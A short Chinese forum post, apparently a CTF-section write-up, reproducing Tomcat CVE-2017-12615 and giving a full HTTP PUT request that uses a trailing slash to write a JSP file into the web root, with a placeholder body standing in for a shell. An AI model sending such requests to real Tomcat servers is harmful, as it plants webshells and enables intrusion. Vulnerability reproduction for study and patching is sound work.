Tomcat 漏洞复现

Track-mss   ·   发表于 2021-08-25 11:34:15   ·   CTF&WP专版

0x01 Tomcat 任意文件写入漏洞 CVE-2017-12615

漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件.

虽然Tomcat对文件后缀有一定检测(不能直接写jsp),但我们使用一些文件系统的特性(如Linux下可用/)来绕过了限制。

直接发送以下数据包即可在Web根目录写入shell:

  1. PUT /1.jsp/ HTTP/1.1
  2. Host: your-ip:8080
  3. Accept: */*
  4. Accept-Language: en
  5. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  6. Connection: close
  7. Content-Type: application/x-www-form-urlencoded
  8. Content-Length: 5
  9. this is shell

如下:


结果:

打赏我,让我更有动力~

1 条回复   |  直到 2021-10-15 | 1637 次浏览

yangroupaomo
发表于 2021-10-15

666

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.